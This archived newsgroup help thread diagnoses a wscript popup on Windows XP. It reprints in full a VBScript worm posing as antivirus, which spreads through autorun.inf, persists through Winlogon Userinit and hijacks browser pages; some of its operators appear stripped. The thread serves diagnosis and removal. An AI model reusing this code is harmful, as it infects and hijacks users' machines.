"wscript.exe - No Disk" error

[Pegasus [MVP]]

"samah" said this in news item

news:uvfqy8hoKHA.5224@TK2MSFTNGP05.phx.gbl...

> Pegasus [MVP] wrote:

>>

>>

>> "samah" said this in news item

>> news:u7ZLyWboKHA.1552@TK2MSFTNGP05.phx.gbl...

>>> Pegasus [MVP] wrote:

>>>>

>>>>

>>>> "samah" said this in news item

>>>> news:#h8NPjUoKHA.5260@TK2MSFTNGP02.phx.gbl...

>>>>> Pegasus [MVP] wrote:

>>>>>>

>>>>>> "samah" said this in news item

>>>>>> news:unuO4CIoKHA.3664@TK2MSFTNGP04.phx.gbl...

>>>>>>> Pegasus [MVP] wrote:

>>>>>>>>

>>>>>>>>

>>>>>>>> "samah" said this in news item

>>>>>>>> news:ej7Qc6#nKHA.5344@TK2MSFTNGP04.phx.gbl...

>>>>>>>>> Pegasus [MVP] wrote:

>>>>>>>>>>

>>>>>>>>>>

>>>>>>>>>> "samah" said this in news item

>>>>>>>>>> news:umd$mO#nKHA.3948@TK2MSFTNGP06.phx.gbl...

>>>>>>>>>>> Win XP SP3.

>>>>>>>>>>>

>>>>>>>>>>> After I eject a CD/DVD from my DVD drive or unmount an disk

>>>>>>>>>>> image from the Daemon Tools virtual drive, I get an error window

>>>>>>>>>>> with the title "wscript.exe - No Disk" and with the message "

>>>>>>>>>>> There is no disk in the drive. Please insert a disk into drive

>>>>>>>>>>> (drive letter):". There are three buttons that I can click:

>>>>>>>>>>> Cancel, Try again, Continue. When I click any of these options,

>>>>>>>>>>> the error window closes but pops up again after an interval of

>>>>>>>>>>> approx. i minute. The only way I can close this window

>>>>>>>>>>> permanently is by rebooting the system.

>>>>>>>>>>>

>>>>>>>>>>> Can anybody help me with this please.

>>>>>>>>>>>

>>>>>>>>>>> Thanks in advance.

>>>>>>>>>>>

>>>>>>>>>>> -samah.

>>>>>>>>>>

>>>>>>>>>> It seems you're running some script, perhaps malicious. How

>>>>>>>>>> exactly do you eject your compact disk?

>>>>>>>>>

>>>>>>>>> With the 'Eject' button (it's a laptop).

>>>>>>>>

>>>>>>>> Ok. Now please do this:

>>>>>>>> - Click Start/Run

>>>>>>>> - Type the three letters cmd and press Enter

>>>>>>>> - Type this command:

>>>>>>>> tasklist | find /i "script"

>>>>>>>> - Report what you see (if anything)

>>>>>>>

>>>>>>> Here is what I got after I re-booted to clear the error window:

>>>>>>>

>>>>>>> image name: wscript.exe

>>>>>>> PID: 2320

>>>>>>> session name: console

>>>>>>> session #: 0

>>>>>>> mem usage: 5964k

>>>>>>>

>>>>>>> This is what I got when the error window is active:

>>>>>>>

>>>>>>> image name: wscript.exe

>>>>>>> PID: 2672

>>>>>>> session name: console

>>>>>>> session #: 0

>>>>>>> mem usage: 2976k

>>>>>>>

>>>>>>> Sorry for my late response. Thank you.

>>>>>>

>>>>>> Here is a method to find out what script is running:

>>>>>> 1. Click Start/Run

>>>>>> 2. Type this command:

>>>>>> notepad c:\ScriptTest.bat

>>>>>> 3. Allow the new file to be created.

>>>>>> 4. Copy & paste the code below into the notepad session.

>>>>>> Do NOT retype it!

>>>>>> 5. Save and close the file.

>>>>>> 6. Open Windows Explorer, locate c:\ScriptTest.bat, then double-click

>>>>>> it.

>>>>>>

>>>>>> When wscript.exe is active then my program will report the script

>>>>>> that it runs. What is it? Can you locate it on the hard disk and post

>>>>>> its contents here?

>>>>>>

>>>>>> @echo off

>>>>>> set Scr="%temp%\TempVBS.vbs"

>>>>>> set VB=echo^>^>%Scr%

>>>>>> cd 1>nul 2>%Scr%

>>>>>> %VB% Set oWMIService = GetObject("winmgmts:\\.\root\CIMV2")

>>>>>> %VB% Set cItems = oWMIService.ExecQuery( _

>>>>>> %VB% "SELECT * FROM Win32_Process where Name = 'wscript.exe'")

>>>>>> %VB% If cItems.Count = 0 Then

>>>>>> %VB% msgbox "Executable ""wscript.exe"" not found."

>>>>>> %VB% Else

>>>>>> %VB% For Each oItem In cItems

>>>>>> %VB% msgbox "The command line is " ^& oItem.CommandLine ^&

>>>>>> cItems.count

>>>>>> %VB% Next

>>>>>> %VB% End If

>>>>>> cscript //nologo %Scr%

>>>>>> del %Scr%

>>>>>>

>>>>>>

>>>>> This is what I got:

>>>>> "The command line is c:\windows\system32\wscript.exe

>>>>> c:\windows\system32\killvirus.vbs1"

>>>>>

>>>>> Thank you so much for your time. Waiting for your advice.

>>>>>

>>>>

>>>> Fine. You now know have two points of attack:

>>>> - Your problem script is the file c:\windows\system32\killvirus.vbs1.

>>>> What does it contain.

>>>> - It gets invoked by wscript.exe. You can prevent this by running

>>>> msconfig.exe, then looking for wscript.exe under the Startup tab and

>>>> removing the tick mark.

>>>>

>>>>

>>>

>>> Sorry. wscript.exe is not appearing in the Startup tab. I re-booted in

>>> safe mode and tried again but still no luck.

>>>

>>> Thank you.

>>

>> What about my first question: What does the script file contain?

>

> Sorry. I could not locate the file. I searched not only the

> c:\windows\system32 folder but also the entire hard disk. Included the

> system and hidden files in the search as well.

>

> Thank you.



If you are unable to find the file killvirus.vbs1 and if you cannot find any

reference to script.exe or wscript.exe under the Startup tab in msconfig.exe

then you can silence this barking do by giving it a bone. The following

command, when executed in the Start/Run box, will do it:



notepad c:\windows\System32\killvirus.vbs



Place a space into the file, then save and close it. Note also that the file

you reported (killvirus.vbs1) sounds unlikely. If it is a script file then

it must have a .vbs extension, not .vbs1.

 

[samah]

Pegasus [MVP] wrote:

>

>

> "samah" said this in news item

> news:uvfqy8hoKHA.5224@TK2MSFTNGP05.phx.gbl...

>> Pegasus [MVP] wrote:

>>>

>>>

>>> "samah" said this in news item

>>> news:u7ZLyWboKHA.1552@TK2MSFTNGP05.phx.gbl...

>>>> Pegasus [MVP] wrote:

>>>>>

>>>>>

>>>>> "samah" said this in news item

>>>>> news:#h8NPjUoKHA.5260@TK2MSFTNGP02.phx.gbl...

>>>>>> Pegasus [MVP] wrote:

>>>>>>>

>>>>>>> "samah" said this in news item

>>>>>>> news:unuO4CIoKHA.3664@TK2MSFTNGP04.phx.gbl...

>>>>>>>> Pegasus [MVP] wrote:

>>>>>>>>>

>>>>>>>>>

>>>>>>>>> "samah" said this in news item

>>>>>>>>> news:ej7Qc6#nKHA.5344@TK2MSFTNGP04.phx.gbl...

>>>>>>>>>> Pegasus [MVP] wrote:

>>>>>>>>>>>

>>>>>>>>>>>

>>>>>>>>>>> "samah" said this in news item

>>>>>>>>>>> news:umd$mO#nKHA.3948@TK2MSFTNGP06.phx.gbl...

>>>>>>>>>>>> Win XP SP3.

>>>>>>>>>>>>

>>>>>>>>>>>> After I eject a CD/DVD from my DVD drive or unmount an disk

>>>>>>>>>>>> image from the Daemon Tools virtual drive, I get an error

>>>>>>>>>>>> window with the title "wscript.exe - No Disk" and with the

>>>>>>>>>>>> message " There is no disk in the drive. Please insert a

>>>>>>>>>>>> disk into drive (drive letter):". There are three buttons

>>>>>>>>>>>> that I can click: Cancel, Try again, Continue. When I click

>>>>>>>>>>>> any of these options, the error window closes but pops up

>>>>>>>>>>>> again after an interval of approx. i minute. The only way I

>>>>>>>>>>>> can close this window permanently is by rebooting the system.

>>>>>>>>>>>>

>>>>>>>>>>>> Can anybody help me with this please.

>>>>>>>>>>>>

>>>>>>>>>>>> Thanks in advance.

>>>>>>>>>>>>

>>>>>>>>>>>> -samah.

>>>>>>>>>>>

>>>>>>>>>>> It seems you're running some script, perhaps malicious. How

>>>>>>>>>>> exactly do you eject your compact disk?

>>>>>>>>>>

>>>>>>>>>> With the 'Eject' button (it's a laptop).

>>>>>>>>>

>>>>>>>>> Ok. Now please do this:

>>>>>>>>> - Click Start/Run

>>>>>>>>> - Type the three letters cmd and press Enter

>>>>>>>>> - Type this command:

>>>>>>>>> tasklist | find /i "script"

>>>>>>>>> - Report what you see (if anything)

>>>>>>>>

>>>>>>>> Here is what I got after I re-booted to clear the error window:

>>>>>>>>

>>>>>>>> image name: wscript.exe

>>>>>>>> PID: 2320

>>>>>>>> session name: console

>>>>>>>> session #: 0

>>>>>>>> mem usage: 5964k

>>>>>>>>

>>>>>>>> This is what I got when the error window is active:

>>>>>>>>

>>>>>>>> image name: wscript.exe

>>>>>>>> PID: 2672

>>>>>>>> session name: console

>>>>>>>> session #: 0

>>>>>>>> mem usage: 2976k

>>>>>>>>

>>>>>>>> Sorry for my late response. Thank you.

>>>>>>>

>>>>>>> Here is a method to find out what script is running:

>>>>>>> 1. Click Start/Run

>>>>>>> 2. Type this command:

>>>>>>> notepad c:\ScriptTest.bat

>>>>>>> 3. Allow the new file to be created.

>>>>>>> 4. Copy & paste the code below into the notepad session.

>>>>>>> Do NOT retype it!

>>>>>>> 5. Save and close the file.

>>>>>>> 6. Open Windows Explorer, locate c:\ScriptTest.bat, then

>>>>>>> double-click it.

>>>>>>>

>>>>>>> When wscript.exe is active then my program will report the script

>>>>>>> that it runs. What is it? Can you locate it on the hard disk and

>>>>>>> post its contents here?

>>>>>>>

>>>>>>> @echo off

>>>>>>> set Scr="%temp%\TempVBS.vbs"

>>>>>>> set VB=echo^>^>%Scr%

>>>>>>> cd 1>nul 2>%Scr%

>>>>>>> %VB% Set oWMIService = GetObject("winmgmts:\\.\root\CIMV2")

>>>>>>> %VB% Set cItems = oWMIService.ExecQuery( _

>>>>>>> %VB% "SELECT * FROM Win32_Process where Name = 'wscript.exe'")

>>>>>>> %VB% If cItems.Count = 0 Then

>>>>>>> %VB% msgbox "Executable ""wscript.exe"" not found."

>>>>>>> %VB% Else

>>>>>>> %VB% For Each oItem In cItems

>>>>>>> %VB% msgbox "The command line is " ^& oItem.CommandLine ^&

>>>>>>> cItems.count

>>>>>>> %VB% Next

>>>>>>> %VB% End If

>>>>>>> cscript //nologo %Scr%

>>>>>>> del %Scr%

>>>>>>>

>>>>>>>

>>>>>> This is what I got:

>>>>>> "The command line is c:\windows\system32\wscript.exe

>>>>>> c:\windows\system32\killvirus.vbs1"

>>>>>>

>>>>>> Thank you so much for your time. Waiting for your advice.

>>>>>>

>>>>>

>>>>> Fine. You now know have two points of attack:

>>>>> - Your problem script is the file

>>>>> c:\windows\system32\killvirus.vbs1. What does it contain.

>>>>> - It gets invoked by wscript.exe. You can prevent this by running

>>>>> msconfig.exe, then looking for wscript.exe under the Startup tab

>>>>> and removing the tick mark.

>>>>>

>>>>>

>>>>

>>>> Sorry. wscript.exe is not appearing in the Startup tab. I re-booted

>>>> in safe mode and tried again but still no luck.

>>>>

>>>> Thank you.

>>>

>>> What about my first question: What does the script file contain?

>>

>> Sorry. I could not locate the file. I searched not only the

>> c:\windows\system32 folder but also the entire hard disk. Included the

>> system and hidden files in the search as well.

>>

>> Thank you.

>

> If you are unable to find the file killvirus.vbs1 and if you cannot find

> any reference to script.exe or wscript.exe under the Startup tab in

> msconfig.exe then you can silence this barking do by giving it a bone.

> The following command, when executed in the Start/Run box, will do it:

>

> notepad c:\windows\System32\killvirus.vbs

>

> Place a space into the file, then save and close it. Note also that the

> file you reported (killvirus.vbs1) sounds unlikely. If it is a script

> file then it must have a .vbs extension, not .vbs1.





While trying to create a new file 'killvirus.vbs' as you suggested, an

existing file with the same name opened, the contents of which I have

copied and pasted below. The file now appears under system32 folder but

I am not able to delete it, it says that the file is in use by another

process. Your 'ScriptTest.bat' still shows the same results,

killvirus.vbs1 not .vbs.



awaiting your further suggestions and Thank you for your valuable time.











'******************************************************************

'********************* Virus Removal VBScript *********************

'************************** Version 1.00 **************************

'******************************************************************

'This antivirus program is intended to repair your computer from

'any sorts of virus attacks.





Option Explicit

On Error Resume Next



Dim

Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,folder,Files,Delete,auto,root,rtn,appfolder,kinzadir

Set Fso = CreateObject("Scripting.FileSystemObject")

Set Shells = CreateObject("Wscript.Shell")

Set WinDir = Fso.GetSpecialFolder(0)

Set SystemDir =Fso.GetSpecialFolder(1)

Set File = Fso.GetFile(WScript.ScriptFullName)

Set Drv = File.Drive

appfolder=Shells.SpecialFolders("AppData")

kinzadir = appfolder & "\dxdlls"

Set InDrive = Fso.drives

Set ReadAll = File.OpenAsTextStream(1,-2)

do while not ReadAll.atendofstream

AllFile = AllFile & ReadAll.readline

AllFile = AllFile & vbcrlf

Loop



crvbs SystemDir,"killvirus.vbs"



Shells.RegWrite

"HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD","0","REG_DWORD"



Count=Drv.DriveType



Do



delt SystemDir,"scvvhsot.exe",true

delt WinDir,"scvvhsot.exe",true

delt SystemDir,"blastclnnn.exe",true

delt SystemDir,"dxdlg.exe",true

delt SystemDir,"wprop.exe",true

delt SystemDir,"boot.vbs",false

delt SystemDir,"imapd.exe",true

delt SystemDir,"imapdb.exe",true

delt SystemDir,"imapdc.dll",false

delt SystemDir,"imapdd.dll",false

delt SystemDir,"imapde.dll",false

delt SystemDir,"kinza.exe",true

delt SystemDir,"isetup.exe",true

delt SystemDir,"Drivers\etc\hints.exe",true

For each Files in kinzadir.Files

set WriteAll = Fso.GetFile(Files.Name)

set Delete = WriteAll.Delete(True)

Next

set WriteAll = Fso.GetFoler(kinzadir)

set Delete = WriteAll.Delete(True)

Shells.RegWrite

"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue","1","REG_DWORD"



Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window

Title","Microsoft Internet explorer"

Shells.RegWrite "HKCU\Software\Microsoft\Internet

Explorer\Main\Search Page","http://goggleonline.blogspot.com/"

Shells.RegWrite

"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","0","REG_DWORD"

Shells.RegWrite

"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","0","REG_DWORD"

Shells.RegWrite

"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"

Shells.RegWrite

"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCmd","0","REG_DWORD"

Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start

Page","http://goggleonline.blogspot.com/"

Shells.RegWrite "HKLM\Software\Microsoft\Windows

NT\CurrentVersion\Winlogon\Shell","explorer.exe"

Shells.RegWrite

"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue","1","REG_DWORD"

Shells.RegWrite "HKLM\Software\Microsoft\Windows

NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _

SystemDir & "\wscript.exe " & SystemDir & "\killvirus.vbs"



For Each Drives In InDrive

root = Drives.Path & "\"

If Fso.GetParentFolderName(WScript.ScriptFullName)=root Then

Shells.Run "explorer.exe " & root

End If

Set folder=Fso.GetFolder(root)

Set Delete = Fso.DeleteFile(SystemDir & "\killvbs.vbs",true)

Set Delete = Fso.DeleteFile(SystemDir & "\VirusRemoval.vbs",true)

If Drives.DriveType=2 Then

delext "inf",Drives.Path & "\"

delext "INF",Drives.Path & "\"

End if



If Drives.DriveType = 1 Or Drives.DriveType = 2 Then

If Drives.Path "A:" Then

delext "vbs",WinDir & "\"

delext "vbs",Drives.Path & "\"



delt Drives.Path, "ravmon.exe",false

if Drives.DriveType = 1 then

crvbs Drives.Path,"killvirus.vbs"

End if

delt Drives.Path,"sxs.exe",false

delt Drives.Path,"kinza.exe",false

delt Drives.Path,"SCVVHSOT.exe",false

delt Drives.Path,"New Folder.exe",false

delt Drives.Path,"Autorun.inf",false

delt Drives.Path,"isetup.exe",false

delt Drives.Path,"explorer.exe",false

delt Drives.Path,"smss.exe",false

delt Drives.Path,"winfile.exe",false

delt Drives.Path,"run.wsh",false



If Drives.DriveType = 1 Then

If Drives.Path"A:" Then

crinf Drives.Path,"autorun.inf"

End If

End If

End if

End If

Next



if Count 1 then

Wscript.sleep 20000

end if





loop while Count1





sub delext(File2Find, SrchPath)

Dim oFileSys, oFolder, oFile,Cut,Delete

Set oFileSys = CreateObject("Scripting.FileSystemObject")

Set oFolder = oFileSys.GetFolder(SrchPath)

Set File = oFileSys.GetFile(WScript.ScriptFullName)



For Each oFile In oFolder.Files

Cut=Right(oFile.Name,3)

If UCse(Cut)=UCase(file2find) Then

If oFile.Name "killvirus.vbs" Then set Delete =

oFileSys.DeleteFile(srchpath & oFile.Name,true)

End If

Next

End sub



sub delt(fPath, fName, kil)

dim fSys, Delet, Wri, raj

set raj = CreateObject("Wscript.Shell")

set fSys = CreateObject("Scripting.FileSystemObject")

if fSys.FileExists(fPath & "\" & fName) then

if kil = true then

raj.Run "taskkill /f /im " & fName,0

set Wri = fSys.GetFile(fPath & "\" & fName)

Wri.Attributes = 0

set Delet = fSys.DeleteFile(fpath & "\" & fname,true)

else

set Wri = fSys.GetFile(fPath & "\" & fName)

Wri.Attributes = 0

set Delet = fSys.DeleteFile(fpath & "\" & fname,true)

End if

End if

end sub



sub crvbs(fPath, fName)

dim dt, dt1, fSys, Writ, mfile, ReadAl, AllFil, chg, aLine, eLine,Shells

set fSys = CreateObject("Scripting.FileSystemObject")

set mfile = fSys.GetFile(WScript.ScriptFullName)

Set ReadAl = mfile.OpenAsTextStream(1,-2)

do while not ReadAl.atendofstream

AllFil = AllFil & ReadAl.readline

AllFil = AllFil & vbcrlf

Loop

If fSys.FileExists(fPath & "\" & fName) then

set Writ = fSys.GetFile(fPath & "\" & fName)

dt = Writ.DateLastModified

dt1 = mfile.DateLastModified

if (datevalue(dt1)-datevalue(dt)) > 0 then

delt fPath,"killvirus.vbs",false

set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,true)

Writ.Write AllFil

Writ.close

set Writ = fSys.GetFile(fPath & "\" & fname)

Writ.Attributes = -1

end if

else

set Writ = fSys.CreateTextFile(fPath & "\killvirus.vbs",true,true)

Writ.Write AllFil

Writ.close

set Writ = fSys.GetFile(fPath & "\" & fName)

Writ.Attributes = -1

end if

end sub



sub crinf(fPath, fName)

dim dt, dt1, fSys, Writ, mfile, ReadAl, AllFil, chg, aLine, eLine,Shells

set fSys = CreateObject("Scripting.FileSystemObject")

eLine =eLine & "[autorun]" & vbcrlf

eLine =eLine & "open=wscript.exe killvirus.vbs" & vbcrlf

eLine =eLine & "icon=%systemroot%\System32\SHELL32.dll,8" & vbcrlf

eLine =eLine & "action=Open folder to view files" & vbcrlf

eLine =eLine & "shell\open=Open" & vbcrlf

eLine =eLine & "shell\open\Command=wscript.exe killvirus.vbs" & vbcrlf

eLine =eLine & "shell\Auto=AutoPlay" & vbcrlf

eLine =eLine & "shell\Auto\Command=wscript.exe killvirus.vbs" & vbcrlf

eLine =eLine & "shell\Explore\Command=wscript.exe killvirus.vbs" & vbcrlf

eLine =eLine & "shell\Find=Search..." & vbcrlf

eLine =eLine & "shell\Find\Command=wscript.exe killvirus.vbs" & vbcrlf

eLine =eLine & "shell\Format...=Format..." & vbcrlf

eLine =eLine & "shell\Format...\Command=wscript.exe killvirus.vbs" & vbcrlf

If fSys.FileExists(fPath & "\" & fName) then

set Chg = fSys.GetFile(fPath & "\" & fName)

set ReadAl = Chg.OpenAsTextStream(1,-2)

do while not ReadAl.atendofstream

aLine = aLine & ReadAl.readline

aLine = aLine & vbcrlf

Loop

ReadAl.close

If trim(aLine) trim(eLine) then

Set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,True)

Writ.write eLine

Writ.close

Set Writ = fSys.GetFile(fPath & "\" & fName)

Writ.Attributes = -1

End if

else

set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,True)

Writ.Write eLine

Writ.Close

Set Writ = fSys.GetFile(fPath & "\" & fName)

Writ.Attributes = -1

end if



End sub



'edited by anwesh.tiwari@gmail.com

 

[Pegasus [MVP]]

"samah" said this in news item

news:#JU59cvoKHA.1548@TK2MSFTNGP06.phx.gbl...

>

>

>

> While trying to create a new file 'killvirus.vbs' as you suggested, an

> existing file with the same name opened, the contents of which I have

> copied and pasted below. The file now appears under system32 folder but I

> am not able to delete it, it says that the file is in use by another

> process. Your 'ScriptTest.bat' still shows the same results,

> killvirus.vbs1 not .vbs.

>

> awaiting your further suggestions and Thank you for your valuable time.



That's one hell of a script, all 235 lines of it. There are a couple of

things that intrigue me about it:

- Its lack of any information about author, version and date of release

- Its boastful claim "This antivirus program is intended to repair your

computer from

any sorts of virus attacks."



The claim is certainly not true. I would do this:

1. Boot the machine into Safe Mode

2. Rename the file to killvirus.bad

3. Create a blank replacement file.



If Step 2 fails then you need to seize ownership of the file and give

yourself full read/write access to it.